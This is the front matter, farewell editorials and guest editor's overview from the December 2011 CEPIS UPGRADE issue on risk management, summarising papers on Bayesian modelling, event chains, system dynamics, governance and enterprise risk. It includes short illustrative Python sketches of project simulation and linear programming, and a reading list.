Transcription
CEPIS UPGRADE is the European Journal
for the Informatics Professional, published bimonthly at <http://cepis.org/upgrade>
Publisher
CEPIS UPGRADE is published by CEPIS (Council of European Professional Informatics Societies, <http://www.
cepis.org/>), in cooperation with the Spanish CEPIS society
ATI (Asociación de Técnicos de Informática, <http://
www.ati.es/>) and its journal Novática
CEPIS UPGRADE monographs are published jointly with
Novática, which publishes them in Spanish (full version printed;
summary, abstracts and some articles online)
CEPIS UPGRADE was created in October 2000 by CEPIS and was
first published by Novática and INFORMATIK/INFORMATIQUE,
bimonthly journal of SVI/FSI (Swiss Federation of Professional
Informatics Societies)
CEPIS UPGRADE is the anchor point for UPENET (UPGRADE European NETwork), the network of CEPIS member societies’ publications,
which currently includes the following:
• inforeview, magazine from the Serbian CEPIS society JISA
• Informatica, journal from the Slovenian CEPIS society SDI
• Informatik-Spektrum, journal published by Springer Verlag on behalf
of the CEPIS societies GI, Germany, and SI, Switzerland
• ITNOW, magazine published by Oxford University Press on behalf of
the British CEPIS society BCS
• Mondo Digitale, digital journal from the Italian CEPIS society AICA
• Novática, journal from the Spanish CEPIS society ATI
• OCG Journal, journal from the Austrian CEPIS society OCG
• Pliroforiki, journal from the Cyprus CEPIS society CCS
• Tölvumál, journal from the Icelandic CEPIS society ISIP
Editorial Team
Chief Editor: Llorenç Pagés-Casas
Deputy Chief Editor: Rafael Fernández Calvo
Associate Editor: Fiona Fanning
Editorial Board
Prof. Nello Scarabottolo, CEPIS President
Prof. Wolffried Stucky, CEPIS Former President
Prof. Vasile Baltac, CEPIS Former President
Prof. Luis Fernández-Sanz, ATI (Spain)
Llorenç Pagés-Casas, ATI (Spain)
François Louis Nicolet, SI (Switzerland)
Roberto Carniel, ALSI – Tecnoteca (Italy)
UPENET Advisory Board
Dubravka Dukic (inforeview, Serbia)
Matjaz Gams (Informatica, Slovenia)
Hermann Engesser (Informatik-Spektrum, Germany and Switzerland)
Brian Runciman (ITNOW, United Kingdom)
Franco Filippazzi (Mondo Digitale, Italy)
Llorenç Pagés-Casas (Novática, Spain)
Veith Risak (OCG Journal, Austria)
Panicos Masouras (Pliroforiki, Cyprus)
Thorvardur Kári Ólafsson (Tölvumál, Iceland)
Rafael Fernández Calvo (Coordination)
Vol. XII, issue No. 5, December 2011
Farewell Edition
3 Editorial. CEPIS UPGRADE: A Proud Farewell
— Nello Scarabottolo, President of CEPIS
ATI, Novática and CEPIS UPGRADE
— Dídac López-Viñas, President of ATI
Monograph
Risk Management
(published jointly with Novática*)
Guest Editor: Darren Dalcher
4 Presentation. Trends and Advances in Risk Management
— Darren Dalcher
10 The Use of Bayes and Causal Modelling in Decision Making,
Uncertainty and Risk — Norman Fenton and Martin Neil
22 Event Chain Methodology in Project Management — Michael
Trumper and Lev Virine
34 Revisiting Managing and Modelling of Project Risk Dynamics: A System Dynamics-based Framework — Alexandre Rodrigues
41 Towards a New Perspective: Balancing Risk, Safety and Danger
— Darren Dalcher
45 Managing Risk in Projects: What’s New? — David Hillson
48 Our Uncertain Future — David Cleden
55 The application of the ‘New Sciences’ to Risk and Project
Management — David Hancock
English Language Editors: Mike Andersson, David Cash, Arthur
Cook, Tracey Darch, Laura Davies, Nick Dunn, Rodney Fennemore,
Hilary Green, Roger Harris, Jim Holder, Pat Moody.
59 Communicative Project Risk Management in IT Projects
— Karel de Bakker
Cover page designed by Concha Arias-Pérez
"Liberty with Risk" / © ATI 2011
Layout Design: François Louis Nicolet
Composition: Jorge Llácer-Gil de Ramales
67 Decision-Making: A Dialogue between Project and Programme
Environments — Manon Deguire
Editorial correspondence: Llorenç Pagés-Casas <[email protected]>
Advertising correspondence: <[email protected]>
Subscriptions
If you wish to subscribe to CEPIS UPGRADE please send an
email to [email protected] with ‘Subscribe to UPGRADE’ as the
subject of the email or follow the link ‘Subscribe to UPGRADE’
at <http://www.cepis.org/upgrade>
Copyright
© Novática 2011 (for the monograph)
© CEPIS 2011 (for the sections Editorial, UPENET and CEPIS News)
All rights reserved unless otherwise stated. Abstracting is permitted
with credit to the source. For copying, reprint, or republication permission, contact the Editorial Team
75 Decisions in an Uncertain World: Strategic Project Risk
Appraisal — Elaine Harris
82 Selection of Project Alternatives while Considering Risks
— Marta Fernández-Diego and Nolberto Munier
87 Project Governance — Ralf Müller
91 Five Steps to Enterprise Risk Management — Val Jonas
The opinions expressed by the authors are their exclusive responsibility
ISSN 1684-5285
* This monograph will also be published in Spanish (full version printed; summary, abstracts, and some
articles online) by Novática, journal of the Spanish CEPIS society ATI (Asociación de Técnicos de
Informática) at <http://www.ati.es/novatica/>.
UPENET (UPGRADE European NETwork)
99 From inforeview (JISA, Serbia)
Information Society
Steve Jobs — Dragana Stojkovic
101 From Informatica (SDI, Slovenia)
Surveillance Systems
An Intelligent Indoor Surveillance System — Rok Piltaver,
Erik Dovgan, and Matjaz Gams
111 From Informatik Spektrum (GI, Germany, and SI, Switzerland)
Knowledge Representation
What’s New in Description Logics — Franz Baader
121 From ITNOW (BCS, United Kingdom)
Computer Science
The Future of Computer Science in Schools — Brian Runciman
124 From Mondo Digitale (AICA, Italy)
IT for Health
Neuroscience and ICT: Current and Future Scenarios
— Gianluca Zaffiro and Fabio Babiloni
135 From Novática (ATI, Spain)
IT for Music
Katmus: Specific Application to support Assisted Music
Transcription — Orlando García-Feal, Silvana Gómez-Meire,
and David Olivieri
145 From Pliroforiki (CCS, Cyprus)
IT Security
Practical IT Security Education with Tele-Lab — Christian
Willems, Orestis Tringides, and Christoph Meinel
CEPIS NEWS
153 Selected CEPIS News — Fiona Fanning
Editorial
CEPIS UPGRADE: A Proud Farewell
It was in the year 2000 that CEPIS made the decision to create "a bimonthly technical, independent, non-commercial freely distributed electronic publication", with the aim of gaining visibility among the large memberships of its affiliated societies and, beyond them, the wider ICT communities in the professional, business, academic and public administration sectors worldwide, while contributing to enlarging and continuously updating their professional skills and knowledge.
CEPIS UPGRADE was the name chosen for that journal, born with the initial cooperation and support of the societies ATI (Asociación de Técnicos de Informática, Spain) and SVI/FSI (Swiss Federation of Professional Informatics Societies), along with their respective publications, Novática and Informatik/Informatique; in the case of ATI and Novática, that cooperation and support have continued until now.
Eleven years and more than 60 issues later, actual measurable facts show that CEPIS UPGRADE has achieved those
goals: hundreds of thousands of visits to, and downloads from,
the journal website at <http://www.cepis.org/upgrade>; presence in prestigious international indexes; references by many
publications; citations made in countless business, professional, academic and even political fora; a newsletter with
around 2,500 subscribers.
All these achievements must be duly stressed now that CEPIS has made the decision to discontinue CEPIS UPGRADE: it is not failure or lack of results that has dictated this extremely painful choice, but the general economic climate. In our case, CEPIS has reached the conclusion that publishing a technical-professional journal is not a top priority today and that our resources should be dedicated to other projects and activities.
CEPIS is proud of its journal, and at the sad moment of distributing its farewell issue our most sincere acknowledgement and gratitude must be presented to each and every one of those who have contributed to its success. Let me name a few of them: the above-mentioned societies ATI and SVI/FSI; Wolffried Stucky and François Louis Nicolet, who gave the initial push; the three Chief Editors who have skilfully and dedicatedly led the journal along these eleven years (the same François Louis Nicolet, Rafael Fernández Calvo and Llorenç Pagés-Casas); professionals in Spain, Belgium and Switzerland (especially Fiona Fanning, Jorge Llácer, Carol-Ann Kogelman, Pascale Schürman and Steve Turpin); plus the Chief Editors of the nine publications that are part of
UPENET (UPGRADE European NETwork), set up in 2003
in order to increase the pan-European projection of the journal.
And, last but not least, thanks a lot also to the multitude
of authors from Europe and other continents who have submitted their papers for review and publication, as well as to
the Guest Editors of the monographs and our team of volunteer English-language editors. We cannot praise them all
enough for their decisive and valuable collaboration.
Now let’s say farewell to CEPIS UPGRADE, but a really proud one!
Nello Scarabottolo
President of CEPIS
<http://www.cepis.org>
Note: A detailed history of CEPIS UPGRADE is available at
<http://www.cepis.org/upgrade/files/iv-09-calvo.pdf>.
ATI, Novática and
CEPIS UPGRADE
The lifecycle of CEPIS UPGRADE has come to an
end after eleven years. The decision has been taken by the
governing bodies of CEPIS and is fully shared by the
Board of ATI (Asociación de Técnicos de Informática),
the Spanish society that has edited the journal on behalf
of CEPIS from the very beginning.
ATI, a founding member of CEPIS which has participated in a large number of its projects and undertakings,
is proud to have played a decisive role in CEPIS UPGRADE’s success by providing all its own human and
material editorial resources through its journal Novática.
We must thank CEPIS for having given us the opportunity to be part of such an important publishing endeavour.
New projects and activities will undoubtedly be promoted by CEPIS and, as in the case of CEPIS UPGRADE,
ATI will, as always, be available and willing to cooperate.
Dídac López-Viñas
President of ATI
<http://www.ati.es>
Risk Management
Presentation
Trends and Advances in Risk Management
Darren Dalcher
1 Introduction
Risks can be found in most human endeavours. They
come from many sources and influence most participants.
Increasingly, they play a part in defining and shaping activities, intentions and interpretations, and thereby directly
influence the future. Accomplishing anything inevitably
implies addressing risks. Within organisations and society
at large, learning to deal with risk is therefore progressively
viewed as a key competence expected at all levels.
Practitioners in computing and information technology
are at the forefront of many new developments. Modern society is characterised by powerful technology, instantaneous communication, rising complexity, tangled networks and
unprecedented levels of interaction and participation. Devising new ways of integrating with modern society inevitably implies learning to co-exist with higher levels of risk,
uncertainty and ignorance. Moreover, society engages in
more demanding ventures whilst continuously requiring
performance and delivery levels that are better, faster and
cheaper. Developers, managers, sponsors, senior executives
and stakeholders are thus faced with escalating levels of risk.
In order to accommodate and address risk we have built
a variety of mechanisms, approaches and structures that we
utilise at different levels and in different situations. This special issue
brings together a collection of reflections, insights and experiences from leading experts working at the forefront of
risk assessment, analysis, evaluation, management and communication. The contributions come from a variety of domains addressing a myriad of tools, perspectives and new
approaches required for making sense of risk at different
levels within organisations. Many of the papers report on
new ideas and advances thereby offering novel perspectives
and approaches for improving the management of risk. The
papers are grounded in both research and practice and therefore deliver insights that summarise the state of the discipline whilst indicating avenues for improvement and placing new trends in the context of risk management and leadership in an organisational setting.
2 Structure and Contents of the Monograph
The thirteen papers selected for the issue showcase four
perspectives in terms of the trends identified within the risk
management domain. The first three papers report on new
tools and approaches that can be used to identify complex
dependencies, support decision making and develop improved capability for uncertainty modelling. The following
four papers look at new ways of interacting with risk management and the development of new perspectives and lenses for addressing uncertainty and the emergence of risk leadership, thereby encouraging a new understanding of the concept of risk. The next two papers report on results from empirical studies related to differences in the perception of decisions between managers of projects and programmes, and on the difference that risk management can make in avoiding IT project failures. The final four papers look at the development of decision-making and risk management infrastructure by addressing areas such as strategic project risk appraisal, project governance, selection of alternative projects at the portfolio level, and the development of enterprise risk management.

The Guest Editor
Darren Dalcher – PhD (Lond) HonFAPM, FBCS, CITP, FCMI – is a Professor of Software Project Management at Middlesex University, UK, and Visiting Professor in Computer Science at the University of Iceland. He is the founder and Director of the National Centre for Project Management. He has been named by the Association for Project Management, APM, as one of the top 10 "movers and shapers" in project management and has also been voted Project Magazine’s Academic of the Year for his contribution in "integrating and weaving academic work with practice". Following industrial and consultancy experience in managing IT projects, Professor Dalcher gained his PhD in Software Engineering from King’s College, University of London, UK. Professor Dalcher is active in numerous international committees, steering groups and editorial boards. He is heavily involved in organising international conferences, and has delivered many keynote addresses and tutorials. He has written over 150 papers and book chapters on project management and software engineering.
He is Editor-in-Chief of Software Process Improvement and Practice, an international journal focusing on capability, maturity, growth and improvement. He is the editor of a major new book series, Advances in Project Management, published by Gower Publishing. His research interests are wide and include many aspects of project management. He works with many major industrial and commercial organisations and government bodies in the UK and beyond. Professor Dalcher is an invited Honorary Fellow of the Association for Project Management (APM), a Chartered Fellow of the British Computer Society (BCS), a Fellow of the Chartered Management Institute, and a Member of the Project Management Institute, the Academy of Management, the IEEE and the ACM. He has received an Honorary Fellowship of the APM, "a prestigious honour bestowed only on those who have made outstanding contributions to project management", at the 2011 APM Awards Evening. <[email protected]>
Many risk calculations, especially in banking and insurance, are derived from statistical models operating on carefully collected banks of historical data. The other typical
approach relies on developing risk registers and quantifying the exposure to risk by identifying and estimating the
probability and the loss impact. The paper by Fenton and
Neil encourages practitioners to look beyond simple causal
explanations available through identification of correlation
or the somewhat ‘accidental’ figures developed through registers. In order to obtain a true measure of risk, practitioners must therefore develop a more holistic perspective that
embraces a causal view of dependencies and
interconnectedness of events. Bayes networks have long
been used to depict relationships and conditional dependencies. The authors show how risks can be modelled as event
chains with a number of possible outcomes, enabling the
integration of risks from multiple perspectives and the decomposition of a risk problem into chains of interrelated
events. As a result, control and mitigation measures may
become more obvious through the process of modelling risks
and the identification of relationships and dependencies that
extend beyond simple causal explanations.
Project planning is initiated during the earlier part of a
project, when uncertainty is at its greatest. The resulting
schedules often fail to capture the full detail of reality.
Moreover, they fail to account for change. The paper by
Trumper and Virine proposes Event Chain methodology
as an approach for modelling uncertainty and evaluating
the impacts of events on project schedules. Event chain
methodology is informed by ideas from other disciplines
and has been used as a network analysis technique in project
management. Tools such as event chain diagrams visualise
the complex relationships and interdependencies between
events. The collection of tools and diagrams support the
planning, scheduling and monitoring of projects allowing
management to visualise some of the issues and take corrective action. The Event Chain methodology takes into
account factors such as delays, chains and complex dynamics that are not acknowledged by other scheduling methods. It attempts to overcome human and knowledge limitations and enables updating of schedules in light of new
information that emerges throughout the development process.
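To make the idea concrete, here is a minimal Monte Carlo sketch in Python (not taken from Trumper and Virine's tool; every task name, duration, probability and delay below is invented for illustration). A probabilistic event on one task adds a delay and can also raise the chance of a follow-on event on a later task, forming a simple event chain whose effect shows up in the sampled distribution of project durations.

import random

# Hypothetical three-task serial schedule: (name, base duration in days).
TASKS = [("design", 10), ("build", 20), ("test", 8)]

# Hypothetical events per task: (probability, delay in days, follow-on task whose
# own event becomes more likely if this event fires). Figures are illustrative only.
EVENTS = {
    "design": (0.30, 5, "build"),   # e.g. late requirements change
    "build":  (0.20, 8, "test"),    # e.g. defect cluster found
    "test":   (0.25, 4, None),      # e.g. regression failures
}
CHAIN_BOOST = 0.25  # how much a fired event raises the next event's probability

def simulate_once(rng):
    """Return one sampled project duration, propagating the event chain."""
    boost = {name: 0.0 for name, _ in TASKS}
    total = 0.0
    for name, base in TASKS:
        total += base
        prob, delay, follow_on = EVENTS[name]
        if rng.random() < min(1.0, prob + boost[name]):
            total += delay
            if follow_on is not None:
                boost[follow_on] += CHAIN_BOOST  # the event chain at work
    return total

def run(n=20000, seed=1):
    rng = random.Random(seed)
    samples = sorted(simulate_once(rng) for _ in range(n))
    print("mean: %.1f days, 80th percentile: %.1f days"
          % (sum(samples) / n, samples[int(0.8 * n)]))

run()

Sampling a distribution of outcomes, rather than a single-point schedule, is what allows the chained events to be seen in percentile estimates of completion time.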
Complex relationships and interdependencies between causes and effects require more complex methods of modelling the impacts and influences between factors. Moreover, the dynamics emerging from uncertain knowledge necessitate a deeper understanding of causal interactions. The
paper by Rodrigues highlights the use of systems dynamics
to capture some of the closed chains of feedback operating
with uncertain environments. Feedback loops and impact
diagrams can show the effects of positive feedback cycles
that can “snowball” alongside other non-linear
effects. Dynamic modelling provides an effective tool for
identifying emergent risks resulting from complex interactions, interconnected chains of causes and events and chains
of feedback. The approach encourages the adoption of holistic solutions by investigating the full conditions that play a part in
a certain interaction, identifying the full chain of events leading to a risk. Moreover, as the model includes multiple variables, it becomes possible to assess the range of impacts on
all aspects and objectives and determine the interactions of
risks, events and causes in order to derive a better understanding of the true complexity and the behaviour of the
risks.
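As a toy illustration of such a feedback loop (a sketch only, with invented coefficients, not the framework described by Rodrigues), the Python fragment below steps a single reinforcing loop: schedule pressure raises the error rate, and errors flow back into the backlog as rework, pushing completion well beyond the plan.

# Toy system-dynamics sketch of a reinforcing rework loop (illustrative only).
# Work is done at a fixed rate, but schedule pressure raises the error fraction
# and the resulting errors return to the backlog as rework.
def simulate(total_work=100.0, rate=5.0, deadline=20.0, dt=1.0):
    backlog, t = total_work, 0.0
    while backlog > 0.1 and t < 200:
        # pressure grows as the remaining work outstrips the remaining time
        pressure = max(0.0, backlog / rate - (deadline - t)) / deadline
        error_fraction = min(0.6, 0.1 + 0.5 * pressure)   # more pressure, more errors
        progress = min(rate, backlog) * dt
        backlog += progress * error_fraction - progress    # rework feeds back
        t += dt
    return t

print("simulated completion: %.0f periods against a 20-period plan" % simulate())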
Developing the right strategy for addressing risk depends
on the context. Different approaches will appeal depending
on the specific circumstances and the knowledge and uncertainty associated with a situation. Dalcher contends that
risk is often associated with danger, and makes use of the
idea of safety to identify different positions on a spectrum
with regards to our approach to risk. At one extreme, anticipation relies on developing full knowledge of the circumstances in advance. Addressing risks can proceed in a reasonably systematic manner through quantification and adjustments. The other alternative is to develop sufficient flexibility to enable the system to adopt a resilient stance that
allows it to be ready to respond to uncertainties, as they
emerge, in a more dynamic fashion. This is done by searching for the next acceptable state and allowing the system to
evolve and grow through experimentation. While the ideal
position is somewhere between the two extremes, organisations can try to balance the different perspectives in a more
dynamic fashion. The adoption of alternative metaphors may
also help to think about risk management in new ways. We
often acknowledge that risk is all about perspective. If managers focus on safety as a resource, they can develop an
alternative representation of the impacts of risk. The dynamic management of safety, or well-being, can thus benefit
from a change of perspective that allows managers to engage with opportunities, success and the future in new ways.
Managing risk is closely integrated with project management. However, despite the awareness of risk and the
recognition of the role of risk management in successfully
delivering projects there is still evidence that risk is not being viewed as an integrated perspective that extends beyond processes. Indeed, the management of risk is not a
precise and well-defined science: It is an art that relies on
attitudes, perceptions, expectations, preferences, influences,
biases, stakeholders and perspectives. The paper by Hillson
looks at how risk is managed in projects. Focusing on risks
in a project may ignore the risk that the overall project poses
to the organisation, perhaps at a portfolio or programme
level. The actual process of managing risks is often flawed
as some of the links and review points are missing. Moreover, insufficient attention has been paid to the human component in risk assessment. Overall the process required for
managing risks requires a more dynamic approach responsive to learning and change. Revisiting our current processes and rethinking our approach can serve to improve our
engagement with risk, thereby improving the outcomes of
projects.
The management of uncertainty, as opposed to risk, offers new challenges. The impact of uncertainty often defers
decisions and delays actions as managers attempt to figure
out their options. While risks can be viewed as the known
unknowns, uncertainty is concerned with the unknown unknowns that are not susceptible to analysis and assessment.
Increasingly, organisations allocate additional contingency
resources for other things that we do not know about. The
paper by Cleden contends that the management of uncertainty requires a completely different approach. Uncertainties cannot be analysed and formulated. Managing project
uncertainty depends on developing an understanding of the
life cycle of uncertainty. Projects exist in a continual state
of dynamic tension with the accumulation of uncertainties
contributing to pushing the project away from its expected
trajectory. Managers endeavour to act swiftly to correct the
deviations and must therefore apply a range of strategies
required to stabilise the project. Uncertainties result from
complex dynamics which will often defy organised attempts
at careful planning. The solution is to adapt and restructure
in a flexible and resilient fashion that will allow the project
to benefit from the uncertainty. Small adjustments will
thereby allow projects to improve and adjust whilst responding favourably to the conditions of uncertainty.
Project managers often have to deal with novel, one of a
kind, unfocused and complex situations that can be characterised as ill structured. To reflect the open-ended, interconnected, social perspective, planners and designers talk of
wicked problems. Such problems tend to be ill-defined and
rely upon much elusive political judgement for resolution.
The paper by Hancock points out that projects are not tame,
instead displaying chaotic, messy and wicked characteristics. Behavioural and dynamic complexities co-exist and
interact confounding decision makers. Applying simplistic, sequential resolution processes is simply inadequate for
messy problems. Problems cannot be solved in isolation
and require conceptual, systemic and social resolution. Moreover, solutions are likely to be good enough at best and will
require stakeholder participation and engagement. The direct implication for tackling uncertainty and addressing
complexity is that the managing risks mindset needs to be
evolved into a risk leadership perspective. Such a perspective would look to guide, learn and adapt to new situations.
Different events, outcomes and behaviours would require
adjustments and the risk process needs to adapt in order to
overcome major political issues. To address the new uncertainties requires a move away from controlling risk towards
a negotiated flexibility that accommodates the disorder and
unpredictability inherent in many complex project environments.
Risk management is often proposed as a solution to the
high failure rate in IT projects. However, the literature is at
best inconclusive about the contributions of risk management to project success. The paper by de Bakker reports on
a detailed literature review which only identified anecdotal
evidence to this effect. A further analysis confirms that risk
management needs to be considered in social terms given
the interactive nature of the process and the limited knowledge that exists about the project and the desired outcomes.
In the following stage, a collection of case studies identified the activity of risk identification as a crucial step contributing to success, as viewed by all involved stakeholders.
It would appear that the action, understanding and reflection generated during that phase make recognisable contributions as identified by the relevant stakeholders. Risk reporting is likewise credited with generating an impact. An
experiment with 53 project groups suggests that those that
carried out a risk identification and discussed the results
performed significantly better than those who did not. These
groups also seemed to be more positive about their project
and the result. The research suggests that it is the exchange
and interaction that make people more aware of the issues.
It also helps in forming the expectations of the different
stakeholder groups. The discussion also has inevitable side
effects, such as changing people’s views about probabilities and values. Nonetheless, the act of sharing, discussing
and deliberating appears to be crucial in forming a better understanding of the issues and
their scale and magnitude.
The long-held assumption of utilising linear sequences
in order to address problems, guide projects and make decisions has contributed to the perception of project and
risk management as engineering or technical domains. Some
of the softer aspects related to the human side of interaction
have been neglected over the years. Deguire points out that
to accommodate complexity the softer aspects of human
interaction need to be taken into account. Indeed, problem
solving requires reflection, interaction and deliberation.
Given that problems and decisions are addressed at the
project management level and, in some organisations, also at the programme management level, and that their approaches to
solving problems require deliberations and reflection at a
different level of granularity, it is interesting to contrast the
perceptions and expectations of managers in these domains.
In contrast with project managers, programme managers
appear to favour inductive processes. The difference might
relate to the need to deliver outcomes and benefits, rather
than outputs and products. As the level of complexity rises,
decisions become more context-related and less mechanistic. Decisions made by programme manager may relate to
making choices about specific projects and determining
wider direction and thus compel managers to engage with
the problem and its context. Indeed, the need to define more
of the assumptions in a wider context forces deeper and
wider consideration, involving people, preferences, context
and organisational issues.
Early choices need to be made about selecting the right
projects, committing resources and maintaining portfolios
and programmes which are balanced. These decisions are
taken at an early stage under conditions of uncertainty and
can be viewed as strategic project decisions. The project
appraisal process and the decision making behaviour that
accompanies it clearly influence the resulting project. The
paper by Harris explores the strategic level risks encountered by managers in different types of projects. This is
achieved by developing a project typology identifying eight
major types of strategic level projects and their typical characteristics. It provides a rare link between strategic level
appraisal and risk management by focusing on the common
risks shared by each type. The strategic investment appraisal
process proposed in the work further supports the implementation of effective decision making ranging from idea
generation and opportunity identification through preliminary assumptions to the findings of the post audit review.
Overall, managers can be guided towards implementing a
strategy that is better suited to the context of their project
thereby enabling the development of a more flexible and
adaptable response. Identification of risks at an early stage
enables better decision making when uncertainty is at its
height.
The choice of the most suitable project is often subject
to financial, technical, environmental
or geographical constraints. Choices often have to be made
at the project portfolio level to select the most viable, or
useful approach. Alternatively, even when a project has been
agreed in principle, there is still a need to determine the
most suitable method for delivering the benefits. The paper
by Fernández-Diego and Munier proposes the use of a linear
programming method to support the choice of a particular
approach and to quantify the risks relevant to each of the
options. The approach allows the decision maker to maximise
on the basis of particular threats (or benefits) and balance
various factors. The use of linear programming in project
management for quantifying values and measuring constraints is relatively new.
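As a hedged sketch of what such a formulation can look like (not the authors' model; the alternatives, figures and constraint values below are made up, and SciPy is assumed to be available), the following fragment uses scipy.optimize.linprog to choose funding levels for three hypothetical alternatives so as to maximise benefit subject to a budget and a cap on aggregate risk exposure.

from scipy.optimize import linprog

# Hypothetical data for three delivery alternatives (A, B, C).
benefit = [120, 90, 60]      # expected benefit of each alternative
cost = [70, 40, 25]          # cost of each alternative
risk = [0.6, 0.3, 0.2]       # quantified risk exposure of each alternative
budget, max_risk = 100, 0.7

# Maximise total benefit (minimise its negative) subject to the budget and the
# aggregate-risk cap; x_i in [0, 1] is the degree to which alternative i is
# funded -- a linear-programming relaxation of a yes/no selection.
result = linprog(
    c=[-b for b in benefit],
    A_ub=[cost, risk],
    b_ub=[budget, max_risk],
    bounds=[(0, 1)] * 3,
)
print("funding levels:", [round(x, 2) for x in result.x])
print("total benefit :", round(-result.fun, 1))

A binary (fund / do not fund) version of the same choice would be an integer programme rather than a plain LP, which is one reason the continuous relaxation is shown here.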
Large corporate failures in the last decade have raised
awareness of the need for organisational governance functions to oversee the effectiveness and integrity of decision
making in organisations. Governance spans the entire scope
of corporate activity extending from strategic aspects and
their ethical implications to the execution of projects and
tasks. It provides the mechanisms, frameworks and reference points for self-regulation. Project governance is rapidly becoming a major area of interest for many organisations and is the topic of the paper by Müller. Governance
sets the boundaries for project management action by defining the objectives, providing the means to achieve them and
evaluating and controlling progress. The orientation of the
organisation in terms of being shareholder or stakeholder
oriented, and the control focus on outcome or behaviour,
would play a key part in identifying the most suitable governance paradigm, which can range from conformist through
agile pragmatist to versatile artist. The paradigm in turn can
shape the approach of the organisation to development, the
processes applied and the overall orientation and structure.
The governance of project management plays a part in directing the governance paradigm, which guides the governance of portfolios, programmes and projects. This helps
to reduce the risk of conflicts and inconsistencies and support the achievement of organisational goals.
Focusing only on operational risks related to a specific
implementation project is insufficient. Risk relates to and
impacts organisational concerns about the survival,
development and growth of an organisation. Specific
projects will incur individual risks. They will also contribute to the organisation’s risk and may impact other areas
and efforts. The paper by Jonas introduces Enterprise Risk
Management as a wider framework used by the entire business to assess the overall exposure to risk and the organisational ability to make timely and well-informed decisions.
The paper looks at the five steps required to implement a
simple and effective Enterprise Risk Management framework. The approach encourages horizontal integration of
organisational risk allowing different units to become aware
of the potential impacts of initiatives in other areas on their
own future, targets, and systems. The normal expectation is
for vertical integration where guidance and instructions are
passed downwards and information is cascaded upwards.
However, the cross-functional perspective allows integration and sharing across different functional units. Vertical
management chains can be used to support leadership and
provide the basis for improved decision making through
enterprise-wide reporting. The required culture change is
from risk management to managing risk. Facilitating the shift
requires people to look ahead and make risk-focused decisions that will benefit their organisations. It also requires
the support and reward mechanisms to recognise and support such a shift.
There are some common themes that run through the
papers in this monograph. Most modern undertakings involve people: Processes cannot ignore the human element
and focus on computational steps alone and therefore a
greater attention to subjective perceptions, stakeholders and
expectations pervades many of the articles. The context of
risk is also crucial. Most authors refer to complex dynamics
and interactions. It would appear that our projects are becoming increasingly more complex and the risks we grapple with increasingly involve technical, social and environmental impacts. The unprecedented level of uncertainty
seems to feature in many of the contributions. The direction advocated in many of the papers requires a growing
recognition of the dynamics involved in interactions, of the
need to lead and guide, of the holistic and systemic aspects of
solving problems, of the need to adapt and respond and of
a need to adopt a more strategic, enterprise-wide view of
situations.
3 Looking Ahead
Risk management appears to be an active area for researchers and practitioners. It is encouraging to see such a
range of views and perspectives and to hear about the advances being proposed. New work in the areas of decision
making, uncertainty, complexity, problem solving, enterprise risk management and governance will continue to revitalise risk management knowledge, skills and competences.
Risk management has progressed in the last 25 years, but it
appears that the new challenges and the focus on organisations, enterprises, and wider systems will add new ideas
and insights. In this issue leading researchers and practitioners have surveyed the development of ideas, perspectives and concepts within risk management and given us a glimpse of the potential solutions.
The journey from risk management towards the wider management of risk, opportunity and uncertainty feels exciting
and worthwhile. While there is still a long way to go, the
journey seems to be both promising and exciting.
Acknowledgements
Sincere thanks must be extended to all the authors for their
contribution to this special issue. The UPGRADE Editorial Team
must also be mentioned, in particular the Chief Editor, Llorenç
Pagés, for his help and support in producing this issue.
Useful References on "Risk Management"
In addition to the materials referenced by the authors
in their articles, we offer the following ones for those who
wish to dig deeper into the topics covered by the monograph.
Books
„ J. Adams. Risk, UCL Press, 1995.
„ D. Apgar. Risk Intelligence, Harvard Business
School Press, 2006.
„ P.L. Bernstein. Against the Gods: The remarkable
Story of Risk, Wiley, 1998.
„ B.W. Boehm. Software Risk Management, IEEE
Computer Society Press, 1989.
„ R.N. Charette. Software Engineering Risk Analysis
and Management, McGraw Hill, 1989.
„ D. Cleden. Managing Project Uncertainty, Gower,
2009.
„ D. Cooper, S. Grey, G. Raymond, P. Walker. Managing Risk in Large Projects and Complex Procurements,
Wiley, 2005.
„ T. DeMarco. Waltzing with Bears, Dorset House,
2003.
„ N. Fenton, M. Neil. Risk Assessment and Decision
Analysis with Bayesian Networks, CRC Press, 2012.
„ G. Gigerenzer. Reckoning with Risk, Penguin
Books, 2003.
„ E. Hall. Managing Risks: Methods for Software
Systems Development, Addison Wesley, 1998.
„ D. Hancock. Tame, Messy and Wicked Risk Leadership, Gower, 2010.
„ E. Harris. Strategic Project Risk Appraisal and Management, Gower, 2009.
„ D. Hillson, P. Simon. Practical Project Risk Management: The ATOM Methodology, Management Concepts, 2007.
„ D. Hillson. Managing Risk in Projects, Gower, 2009.
„ C. Jones. Assessment and Control of Software Risks,
Prentice Hall, 1994.
„ M. Modarres. Risk Analysis in Engineering: Techniques, Tools and Trends, Taylor and Francis, 2006.
„ R. Müller. Project Governance, Gower, 2009.
„ M. Ould. Managing Software Quality and Business
Risk, Wiley, 1999.
„ P.G. Smith, G.M. Merritt. Proactive Risk Management: Controlling Uncertainty in Product Development,
Productivity Press, 2002.
„ N.N. Taleb. The Black Swan: The Impact of the
Highly Improbable, Random House, 2007.
„ S. Ward, C. Chapman. How to Manage Project Opportunity and Risk, 3rd edition, John Wiley, 2011.
„ G. Westerman, R. Hunter. IT Risk: Turning Business threats into Competitive Advantage, Harvard Business School Press, 2007.
Articles and Papers
„ H. Barki, S. Rivard, J. Talbot. Toward an Assessment of Software Development Risk, Journal of Management Information Systems, 10(2), 203-225, 1993.
„ C.B. Chapman. Key Points of Contention in Framing Assumptions for Risk and Uncertainty Management, International Journal of Project Management, 24(4), 303-313, 2006.
„ F.M. Dedolph. The Neglected Management Activity: Software Risk Management, Bell Labs Technical Journal, 8(3), 91-95, 2003.
„ A. De Meyer, C.H. Loch, M.T. Pich. Managing
Project Uncertainty: From Variation to Chaos, MIT Sloan
Management Review, 59-67, 2002.
„ R.E. Fairley. Risk Management for Software
Projects, IEEE Software, 11(3), 57-67, 1994.
„ R.E. Fairley. Software Risk Management Glossary,
IEEE Software, 22(3), 101, 2005.
„ D. Gotterbarn, S. Rogerson. Responsible Risk Analysis for Software Development: Creating the Software Development Impact Statement, Communications of the Association for Information Systems, 15, 730-750, 2005.
„ S.J. Huang, W.M. Han. Exploring the Relationship
between Software Project Duration and Risk Exposure: A
Cluster Analysis, Journal of Information and Management,
45(3), 175-182, 2008.
„ J. Jiang, G. Klein. Risks to Different Aspects of System Success, Information and Management, 36(5), 264-272, 1999.
„ J.J. Jiang, G. Klein, S.P.J. Wu, T.P. Liang. The Relation of Requirements Uncertainty and Stakeholder Perception Gaps to Project Management Performance, The Journal of Systems and Software, 82(5), 801-808, 2009.
